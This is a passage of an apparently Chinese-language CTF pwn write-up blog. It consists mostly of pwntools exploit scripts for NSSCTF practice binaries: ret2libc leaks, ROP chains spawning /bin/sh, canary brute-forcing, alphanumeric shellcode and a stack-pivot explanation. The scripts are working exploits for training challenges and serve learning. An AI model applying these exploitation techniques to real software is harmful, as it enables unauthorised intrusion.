p64(system_add)<br>\u200b<br>io.sendlineafter(b'story!', payload2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2019\u4e1c\u5317]PWN2<\/h2>\n\n\n\n<p>\u653e\u592a\u4e45\u5fd8\u4e86\uff0c\u597d\u50cf\u662f\u672c\u5730\u5c31\u662f\u6253\u4e0d\u901a\uff0c\u8fdc\u7a0b\u80fd\u8fc7<\/p>\n\n\n\n<p>\u4f46\u662f\u6709\u4fe9exp\uff0c\u60f3\u4e0d\u8d77\u6765\u5230\u5e95\u54ea\u7248\u80fd\u7528\u4e86\uff0c\u90fd\u8d34\u4e00\u4efd\u4ee5\u793a\u656c\u610f\uff08\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = \"debug\"<br>\u200b<br>#io = remote(\"node5.anna.nssctf.cn\",28952)<br>io = process(\".\/pwn\")<br>elf = ELF(\".\/pwn\")<br>libc = ELF(\".\/libc6_2.27-0ubuntu2_amd64.so\")<br>\u200b<br>\u200b<br>ret = 0x00000000004006b9<br>pop_rdi = 0x0000000000400c83<br>puts_plt = elf.plt&#91;'puts'] &nbsp;<br>puts_got = elf.got&#91;'puts']<br>en_addr = 0x00000000004009A0<br>\u200b<br>print(hex(puts_plt))<br>print(hex(puts_got))<br>\u200b<br>\u200b<br>\u200b<br>offset = 0x50+8<br>\u200b<br>io.sendlineafter(b\"Input your choice!\\n\", b'1')<br>\u200b<br>\u200b<br>pd = b'A' * offset &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>pd += p64(pop_rdi) &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br>pd += p64(puts_got) &nbsp; &nbsp; &nbsp; &nbsp; <br>pd += p64(puts_plt) &nbsp; &nbsp; &nbsp; &nbsp; <br>pd += p64(en_addr) <br>\u200b<br>#gdb.attach(io)<br>io.sendlineafter(b\"Input your Plaintext to be encrypted\\n\", pd)<br>\u200b<br>leak = u64(io.recvuntil(b'\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>log.info(f\"Leaked puts@libc: {hex(leak)}\")<br>\u200b<br> <br>libc_base = leak - libc.sym&#91;'puts'] <br>log.info(f\"Libc base: {hex(libc_base)}\")<br>system_addr = libc_base + libc.sym&#91;'system']<br>binsh_addr = libc_base + next(libc.search(b'\/bin\/sh\\x00'))<br>\u200b<br>\u200b<br>log.success(f\"system:{hex(system_addr)}\")<br>log.success(f\"bin_sh:{hex(binsh_addr)}\")<br>\u200b<br>pd2 &nbsp;= b'a' * offset &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>pd2 += p64(pop_rdi) &nbsp; &nbsp; <br>pd2 += p64(binsh_addr) &nbsp; &nbsp;<br>pd2 += p64(ret)<br>pd2 += p64(system_addr)<br>\u200b<br>io.sendlineafter(b\"Input your Plaintext to be encrypted\\n\", pd2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>leak = lambda name,content: log.success('{}={:#x}'.format(name,content))<br>p = process(\".\/pwn\")<br>p.sendline(b'1')<br>elf = ELF('.\/pwn')<br>rdi = 0x0400c83<br>ret = 0x04006b9<br>encrypt_addr = 0x04009A0<br>main_addr = 0x0400B28<br>strlen_got = elf.got['strlen']<br>puts_got = elf.got['puts']<br>puts_plt = elf.plt['puts']<br>payload = b'a'*(0x50+8) + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr)<br>p.sendline(payload)<br>p.recvuntil(b'oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\\x83\\x0c@\\n')<br>puts_addr = u64(p.recvuntil(b'\\n',drop=True).ljust(8,b'\\x00'))<br>leak('puts_addr',puts_addr)<br>libc = ELF('.\/libc6_2.27-0ubuntu2_amd64.so')<br>libc_base = puts_addr - libc.sym['puts']<br>system_addr = libc_base + libc.sym['system']<br>bin_sh = libc_base + next(libc.search(b'\/bin\/sh'))<br>leak('libc_base',libc_base)<br>leak('system_addr',system_addr)<br>leak('bin_sh',bin_sh)<br>payload1 = b'a'*0x50 + b'a'*8 +p64(rdi) + p64(bin_sh) + p64(ret) + p64(system_addr)<br>p.send(payload1)<br>p.interactive()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2019\u534e\u5357]PWN3<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>\u200b<br>io = process(\".\/pwn\")<br>\u200b<br>offset = 0x10 + 8 <br>gadget = 0x0000000004004D6<br>ret = 0x00000000004003a9<br>\u200b<br>pd = b'a'*offset<br>pd += p64(ret)<br>pd += p64(gadget)<br>\u200b<br>\u200b<br>gdb.attach(io)<br>io.send(pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2023 \u521d\u8d5b]\u70e7\u70e4\u644a\u513f<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>\u200b<br>context(os=\"linux\", arch=\"amd64\", log_level=\"debug\")<br>\u200b<br>io = remote(\"node4.anna.nssctf.cn\",28253)<br>\u200b<br>\u200b<br>io.sendlineafter(b'&gt; ', b'2')<br>io.sendline(b'1')<br>io.sendline(b'-999999')<br>io.sendline(b'4')<br>io.sendline(b'5')<br>\u200b<br>syscall &nbsp; &nbsp; &nbsp; &nbsp; = 0x0000000000402404<br>pop_rdi_ret &nbsp; &nbsp; = 0x000000000040264f<br>pop_rdx_rbx_ret = 0x00000000004a404b<br>pop_rsi_ret &nbsp; &nbsp; = 0x000000000040a67e<br>name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;= 0x00000000004E60F0<br>pop_rax_ret &nbsp; &nbsp; = 0x0000000000458827<br>ret &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; = 0x000000000040101a<br>payload = b'\/bin\/sh\\x00' + b'a' * 0x20 + p64(pop_rax_ret) + p64(59) + p64(pop_rdi_ret) + p64(name) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_rbx_ret) + p64(0) + p64(0) + p64(syscall)<br>io.sendlineafter(\"\u8bf7\u8d50\u540d\uff1a\\n\", payload)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2023 \u521d\u8d5b]funcanary<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>elf = ELF('.\/service')<br>p = process('.\/service')<br>#p=remote('node5.anna.nssctf.cn',27873)<br>p.recvuntil('welcome\\n')<br>canary = b'\\x00'<br>\u200b<br>for k in range(7):<br> &nbsp; &nbsp;for i in range(256):<br> &nbsp; &nbsp; &nbsp; &nbsp;p.send(b'a'*0x68 + canary + p8(i))<br> &nbsp; &nbsp; &nbsp; &nbsp;a = p.recvuntil(\"welcome\\n\")<br> &nbsp; &nbsp; &nbsp; &nbsp;if b\"fun\" in a:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;canary += p8(i)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(b\"canary: \" + canary)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>catflag = 0x0231<br>while(1):<br> &nbsp; &nbsp;for i in range(16):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = b'A' * 0x68 + canary + b'A' * 8 + p16(catflag)<br> &nbsp; &nbsp; &nbsp; &nbsp;p.send(payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;#pause()<br> &nbsp; &nbsp; &nbsp; &nbsp;a = p.recvuntil(\"welcome\\n\",timeout=1)<br> &nbsp; &nbsp; &nbsp; &nbsp;print(a)<br> &nbsp; &nbsp; &nbsp; &nbsp;if b\"welcome\" in a:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;catflag += 0x1000<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue<br> &nbsp; &nbsp; &nbsp; &nbsp;if b\"NSSCTF\" in a:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(a)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>\u200b<br>p.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]pwnner<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"node5.anna.nssctf.cn\",21999)<br>payload=b'a'*(0x40+0x08)+p64(0x4008B2)<br>io.sendlineafter(b'name:',b'1956681178')<br>io.sendlineafter(b'next?',payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]ezr0p64<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>elf = ELF(\".\/pwn\")<br>libc = ELF(\".\/libc.so.6\")<br>\u200b<br>\u200b<br>io = remote(\"node5.anna.nssctf.cn\",27494)<br>\u200b<br>io.recvuntil(b'Gift :')<br>puts_addr = io.recvuntil(b'\\n')&#91;0:14]<br>success(f\"puts_addr : {puts_addr}\")<br>\u200b<br>libc_base = int(puts_addr,16) - libc.symbols&#91;'puts']<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>offset = 0x100 + 8<br>\u200b<br>ret = 0x000000000040101a<br>rdi = 0x00000000004012a3<br>pd = b'a' * offset<br>pd += p64(ret)<br>pd += p64(rdi)<br>pd += p64(bin_sh_add)<br>pd += p64(system_add)<br>\u200b<br>io.sendline(pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 Week1]safe_shellcode<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(arch='amd64', os='linux', log_level='debug')<br>io = remote(\"node5.anna.nssctf.cn\",29442)<br>#io = process('.\/pwn')<br>\u200b<br>shellcode = \"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t\"<br>io.send(shellcode)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[LitCTF 2023]\u72e0\u72e0\u7684\u6ea2\u51fa\u6d85~<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>\u200b<br>io = remote('node4.anna.nssctf.cn',28296)<br>#io=process(\".\/pwn\")<br>elf = ELF('.\/pwn')<br>libc= ELF('.\/libc-2.31.so')<br>\u200b<br>ret_add =0x0000000000400556<br>pop_rdi =0x00000000004007d3<br>main_add =0x0000000004006B0<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \",hex(puts_got))<br>print(\"Puts_plt: \",hex(puts_plt))<br>\u200b<br>offset=0x67<br>payload1 = b'\\x00'<br>payload1 += b'a' * (offset) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_add)<br>io.sendlineafter(b'message:', payload1)<br>io.recvuntil(b'Received\\n')<br>\u200b<br>puts_addr = u64(io.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))<br>print(\"Puts_addr: \",hex(puts_addr))<br>\u200b<br>\u200b<br>\u200b<br>libc_base = puts_addr - libc.symbols&#91;'puts']<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>payload2 = b'\\x00'<br>payload2 += b'a' * (offset) + p64(ret_add) + p64(pop_rdi) + p64(bin_sh_add) + p64(system_add)<br>\u200b<br>io.sendlineafter(b'message:', payload2)<br>io.recv()<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]KEEP ON<\/h2>\n\n\n\n<p>\u597d\u50cf\u4e00\u76f4\u6ca1\u6709\u4e13\u95e8\u5199\u8fc7\u5b8c\u6574\u7684\u6808\u8fc1\u79fb<\/p>\n\n\n\n<p>\u5c31\u8865\u4e2a\u6863\u5427<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>__int64 vuln()<br>{<br> &nbsp;char s&#91;80]; \/\/ &#91;rsp+0h] &#91;rbp-50h] BYREF<br>\u200b<br> &nbsp;memset(s, 0, sizeof(s));<br> &nbsp;puts(\"please show me your name: \");<br> &nbsp;read(0, s, 0x48uLL);<br> &nbsp;printf(\"hello,\");<br> &nbsp;printf(s);<br> &nbsp;puts(\"keep on !\");<br> &nbsp;read(0, s, 0x60uLL);<br> &nbsp;return 0LL;<br>}<\/code><\/pre>\n\n\n\n<p>%p\u57fa\u7840\u8c03\u8bd5\u5b9a\u4f4d\u683c\u4e32\u6808\u504f\u79fb<\/p>\n\n\n\n<p>\u6d4b\u51fa\u6765\u662fs\u6570\u7ec4\u57286<\/p>\n\n\n\n<p>s\u5728rbp-50\u7684\u5730\u65b9<\/p>\n\n\n\n<p>0x50\/8 = 10<\/p>\n\n\n\n<p>10+6 = 16<\/p>\n\n\n\n<p>rbp\u5728\u6808\u4e0a\u7684\u504f\u79fb\u5c31\u627e\u5230\u4e86<\/p>\n\n\n\n<p>\u6cc4\u9732\u4e00\u4e0b\u5c31\u597d\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"295\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-11.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-665\"  sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>leave<\/p>\n\n\n\n<p>retn<\/p>\n\n\n\n<p>\u8fd9\u4fe9\u5c31\u662f\u6808\u8fc1\u79fb\u7684\u6700\u6838\u5fc3\u4e4b\u5904\u4e86<\/p>\n\n\n\n<p>\u5176\u76f8\u5f53\u4e8e<\/p>\n\n\n\n<p>mov rsp rbp;<\/p>\n\n\n\n<p>pop rbp<\/p>\n\n\n\n<p>\u6b64\u65f6rsp\u4e0erbp\u4f4d\u4e8e\u4e86\u4e00\u4e2a\u5730\u5740\uff0c\u53ef\u4ee5\u73b0\u5728\u628a\u5b83\u4eec\u6307\u5411\u7684\u90a3\u4e2a\u5730\u5740\uff0c\u5373\u5f53\u6210\u6808\u9876\u53c8\u53ef\u4ee5\u5f53\u6210\u662f\u6808\u5e95\u3002\u7136\u540epop rbp\uff0c\u5c06<strong>\u6808\u9876\u7684\u5185\u5bb9<\/strong>\u5f39\u5165rbp\uff08\u6b64\u65f6\u6808\u9876\u7684\u5185\u5bb9\u4e5f\u5c31\u662frbp\u7684\u5185\u5bb9\uff0c\u4e5f\u5c31\u662f\u8bf4\u73b0\u5728\u628arbp\u7684\u5185\u5bb9\u8d4b\u7ed9\u4e86rbp\uff09\u3002\u56e0\u4e3arsp\u8981\u65f6\u523b\u6307\u5411\u6808\u9876\uff0c\u65e2\u7136\u6808\u9876\u7684\u5185\u5bb9\u90fd\u5f39\u8d70\u4e86\uff0c\u90a3\u4e48rsp\u81ea\u7136\u8981\u5f80\u4e0b\u632a\u4e00\u4e2a\u5185\u5b58\u5355\u5143<\/p>\n\n\n\n<p>\u8bf4\u56de\u9898\u76ee\uff0c\u4e3a\u4ec0\u4e48S\u53c8\u7b49\u4e8erbp &#8211; 0x60\u4e86\u5462\uff1f<\/p>\n\n\n\n<p>emmmm\uff0cgdb\u8c03\u8c03\u770b\u5c31\u597d\u4e86\uff0c\u4e0d\u591a\u5199\u4e86\uff0c\u4e24\u6b21\u8bfb\u5165\uff0c\u7b2c\u4e00\u6b21\u6cc4\u9732\u7b2c\u4e8c\u6b21\u8f93\u4e2abbbb\uff0csearch bbbb\u561b\uff08\uff09<\/p>\n\n\n\n<p>\u6b38\uff0c\u8fd9\u4e0bpd\u5c31\u80fd\u5199\u4e86<\/p>\n\n\n\n<p>rdi\u6709\u7684\uff0cleave\u6709\u7684\uff0csyscall\u6709\u7684<\/p>\n\n\n\n<p>\u6808\u6ea2\u51fa\u4e5f\u770b\u5230\u4e86<\/p>\n\n\n\n<p>ROP\u94fe\u5c31\u597d\u5199\u4e86<\/p>\n\n\n\n<p>\u597d\u50cf\u5199\u7684pd\u53ef\u8bfb\u6027\u6bd4\u8f83\u5dee\u2026\u2026<\/p>\n\n\n\n<p>\u5148\u5199\u4e1c\u897f<\/p>\n\n\n\n<p>vuln \u51fd\u6570\u7684\u8fd4\u56de\u6d41\u7a0b\u662f\u56fa\u5b9a\u7684\uff1a<code>leave\uff08\u539f\u6307\u4ee4\uff09\u2192 retn\uff08\u539f\u6307\u4ee4\uff09<\/code>\uff0c\u901a\u8fc7 pd \u8986\u76d6\u4e86\u4e24\u4e2a\u5173\u952e\u5730\u5740\uff0c\u8ba9\u8fd9\u4e2a\u6d41\u7a0b\u53d8\u6210 \u201c\u6808\u8fc1\u79fb\u89e6\u53d1\u6d41\u7a0b\u201d\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8986\u76d6\u300c\u4fdd\u5b58\u7684 rbp\u300d\uff1apd \u672b\u5c3e\u7684<code>p64(s)<\/code> \u2192 \u628a\u6808\u5e27\u57fa\u5740\u6539\u6210 s\uff1b<\/li>\n\n\n\n<li>\u8986\u76d6\u300c\u8fd4\u56de\u5730\u5740\u300d\uff1apd \u672b\u5c3e\u7684<code>p64(leave)<\/code> \u2192 \u628a\u8fd4\u56de\u5730\u5740\u6539\u6210 leave \u6307\u4ee4\u5730\u5740\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u9636\u6bb5 1 \u7684\u6267\u884c\u6b65\u9aa4\uff08\u51fd\u6570\u8fd4\u56de\u65f6\uff0c\u65e9\u4e8e\u6240\u6709 ROP \u6307\u4ee4\uff09\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6267\u884c\u539f\u51fd\u6570\u7684leave\u6307\u4ee4\uff1a\n<ul class=\"wp-block-list\">\n<li><code>mov rsp, rbp<\/code> \u2192 rsp \u8df3\u8f6c\u5230\u4f60\u8986\u76d6\u7684\u300c\u4fdd\u5b58\u7684 rbp\u300d=s\uff1b<\/li>\n\n\n\n<li><code>pop rbp<\/code> \u2192 rsp+8\uff0crbp \u88ab\u66f4\u65b0\u4e3a s\uff08\u6b64\u65f6 rbp \u5df2\u65e0\u5173\u7d27\u8981\uff09\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\u6267\u884c\u539f\u51fd\u6570\u7684retn\u6307\u4ee4\uff1a\n<ul class=\"wp-block-list\">\n<li>\u5f39\u51fa\u6808\u9876\u7684\u300c\u8fd4\u56de\u5730\u5740\u300d=leave\uff08\u4f60\u8986\u76d6\u7684\uff09\uff0c\u8df3\u8f6c\u5230 leave \u6307\u4ee4\u6267\u884c\uff1b<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>\u6267\u884c\u4f60\u8986\u76d6\u7684leave\u6307\u4ee4\uff08\u7b2c\u4e8c\u6b21\u6267\u884c leave\uff09\uff1a\n<ul class=\"wp-block-list\">\n<li><code>mov rsp, rbp<\/code> \u2192 rsp \u518d\u6b21\u91cd\u7f6e\u4e3a s\uff08\u6808\u8fc1\u79fb\u7684\u6838\u5fc3\u4e00\u6b65\uff0c\u628a rsp \u56fa\u5b9a\u5230 s \u6570\u7ec4\u8d77\u59cb\uff09\uff1b<\/li>\n\n\n\n<li><code>pop rbp<\/code> \u2192 rsp+8\uff0c\u4f46\u6b64\u65f6 rsp \u5df2\u7ecf\u6307\u5411 s \u6570\u7ec4\uff0c\u6808\u8fc1\u79fb\u5b8c\u6210<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<p>\u6808\u8fc1\u79fb\u5b8c\u6210\u540e\uff0crsp \u56fa\u5b9a\u5728 s \u6570\u7ec4\u8d77\u59cb\u5730\u5740\uff08s\uff09\uff0c\u7a0b\u5e8f\u7684\u6307\u4ee4\u6307\u9488\uff08rip\uff09\u4f1a\u81ea\u52a8\u6307\u5411 s\u2014\u2014 \u4e5f\u5c31\u662f pd \u524d\u9762\u7684<code>p64(0)<\/code>\u5730\u5740\uff0c\u5f00\u59cb\u6267\u884c ROP \u94fe\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7b2c\u4e00\u6b65\uff1a\u6267\u884c<code>p64(0)<\/code>\uff08\u65e0\u6548\u6307\u4ee4\uff09\uff1b<\/li>\n\n\n\n<li>\u7b2c\u4e8c\u6b65\uff1a\u6267\u884c<code>p64(ret)<\/code>\uff08\u8854\u63a5\u6307\u4ee4\uff09\uff1b<\/li>\n\n\n\n<li>\u7b2c\u4e09\u6b65\uff1a\u6267\u884c<code>p64(pop_rdi)<\/code>\uff08\u4f20\u53c2\u6307\u4ee4\uff09\uff1b<\/li>\n\n\n\n<li>&#8230; \u540e\u7eed\u6267\u884c<code>system<\/code>\u8c03\u7528\u3002<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = process(\".\/hdctf\")<br># io = remote(\"node4.anna.nssctf.cn\",28828)<br>elf = ELF(\".\/hdctf\")<br>\u200b<br>\u200b<br>pop_rdi = 0x00000000004008d3<br>ret = 0x00000000004005b9<br>syscall = elf.plt&#91;\"system\"]<br>leave = 0x00000000004007f2<br>\u200b<br>#gdb.attach(io)<br>io.sendline(b'%16$p')<br>io.recvuntil(b'hello,')<br>rbp = int(io.recv()&#91;2:14],16)<br>\u200b<br>rbp_addr = hex(rbp)<br>success(f\"rbp_addr = {rbp_addr}\")<br>\u200b<br>s = rbp - 0x60 <br>s_addr = hex(s)<br>success(f\"  s_addr = {s_addr}\")<br>\u200b<br>pd = b'aaaaaaaa' &nbsp;<br>pd += p64(ret)<br>pd += p64(pop_rdi)<br>pd += p64(s + 0x8*5)<br>pd += p64(syscall)<br>pd += b'\/bin\/sh\\x00'<br>pd = pd.ljust(0x50,b'a')<br>pd += p64(s)<br>pd += p64(leave)<br>print(pd)<br>\u200b<br>io.send(pd)<br>\u200b<br>\u200b<br>\u200b<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2019\u4e1c\u5357]PWN2<\/h2>\n\n\n\n<p>\u6000\u7591\u5c31\u662fkeepon\u6bcd\u9898<\/p>\n\n\n\n<p>32\u4f4d\u7248\u672c\u800c\u5df2<\/p>\n\n\n\n<p>\u6539\u5199\u4e00\u70b9\u70b9\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u5c31\u4e0d\u591a\u5199\u4e86\uff0cexp\u91cc\u8fd8\u7b97\u6709\u70b9\u6ce8\u91ca\uff0c\u5e0c\u671b\u4ee5\u540e\u7684\u81ea\u5df1\/\u770b\u6211\u535a\u5ba2\u7684\u540e\u751f\u770b\u5f97\u61c2\uff08\u597d\u5427\uff0c\u5b9e\u9645\u4e0a\u662f\u6211\u71ac\u4e0d\u52a8\u4e86\uff0c\u5c31\u8fd9\u6837\u5427\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>#io = process(\".\/pwn\")<br>io = remote(\"node5.anna.nssctf.cn\",26611)<br>elf = ELF(\".\/pwn\")<br>\u200b<br>syscall = 0x08048559<br>ret = 0x080483a6<br>leave = 0x08048562<br>#\u6cc4\u6f0frbp\u5730\u5740<br>pd = b'a'*0x28<br>io.send(pd)<br>io.recvuntil(pd)<br>\u200b<br>rbp = u32(io.recv(4))<br>print(hex(rbp))<br>\u200b<br>#\u5730\u5740\u8ba1\u7b97<br>#ebp 0xffffcd68 \u2014\u25b8 0xffffcd78 \u25c2\u2014 0<br>#ebp \u524d\u540e\u53d8\u53160x10<br>padding = 0x10<br>#s_size<br>s = 0x28<br>#\u76ee\u6807target\u5730\u5740<br>target = rbp - padding - s<br>\u200b<br>#\u6784\u9020rop\u94fe<br>pd2 = p32(0)<br>pd2 += p32(ret)<br>pd2 += p32(syscall)<br>pd2 += p32(target+0x4*4)<br>pd2 += b'\/bin\/sh\\x00'<br>pd2 = pd2.ljust(0x28,b'a')<br>pd2 += p32(target)<br>pd2 += p32(leave)<br>\u200b<br>io.send(pd2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u7a81\u7136\u60f3\u8d77\u6765\u505a\u7684\u65f6\u5019\u5fd8\u4e86\u7684\u4e00\u4e2a\u5c0f\u7ec6\u8282\uff0c\u8fd8\u662f\u51b3\u5b9a\u8865\u5145\u4e00\u4e0b<\/p>\n\n\n\n<p>\u8fd9\u91ccu32\u80fd\u6253\u5305\u5230\u6570\u636e\u7684\u539f\u56e0\u662f<\/p>\n\n\n\n<p>printf\u7684\u622a\u6b62\u662f\u9760\u6536\u5230<code>\\0<\/code>\u5224\u65ad<\/p>\n\n\n\n<p>\u53ea\u8981\u628as\u6570\u7ec4\u5168\u90e8\u8986\u76d6\u6389\uff0c\u4e0d\u591a\u8986\u76d6pre_rbp\u7684\u56db\u5b57\u8282\u5185\u5bb9<\/p>\n\n\n\n<p>\u5c31\u80fd\u63a5\u6536\u5230s\u6570\u7ec4\u540e\u9762\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u53ea\u65364\u5b57\u8282\uff0c\u5c31\u521a\u597d\u662fpre_rbp<\/p>\n\n\n\n<p>\u6b38\uff0c\u597d\u4e86\uff0c\u5c31\u8fd9\u4e48\u4e2a\u60c5\u51b5<\/p>\n\n\n\n<p>\u6808\u8fc1\u79fb\u94fe\u6761\u8fd8\u662f\u86ee\u660e\u6670\u7684\uff0c\u5927\u5dee\u4e0d\u5dee\u5c31\u8fd9\u4e2a\u94fe\u8def<\/p>\n\n\n\n<p>\u6808\u8fc1\u79fb\uff0cleave\u7684\u827a\u672f\u8bf4\u662f<\/p>\n\n\n\n<p>\u4e3a\u4e86\u9762\u8bd5\uff0c\u8bb0\u5f97\u7262\u8bb0\u5176\u7b49\u4ef7\u7684\u6c47\u7f16\u6307\u4ee4\u662f<\/p>\n\n\n\n<p>mov rsp , rbp<\/p>\n\n\n\n<p>pop rbp<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">[HDCTF 2023]Minions<\/h2>\n\n\n\n<p>\u8fd9\u9898\u5c31\u7a0d\u5fae\u5199\u7ec6\u4e00\u70b9\uff0c\u8fd8\u662f\u86ee\u6709\u610f\u601d\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-12-1024x498.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-12-1024x498.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-666\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>key\u8981102\u624d\u80fd\u8fdb\u4e24read\uff0c\u8003\u8651\u600e\u4e48\u8fdbread<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-13.png'><img class=\"lazyload lazyload-style-1\" 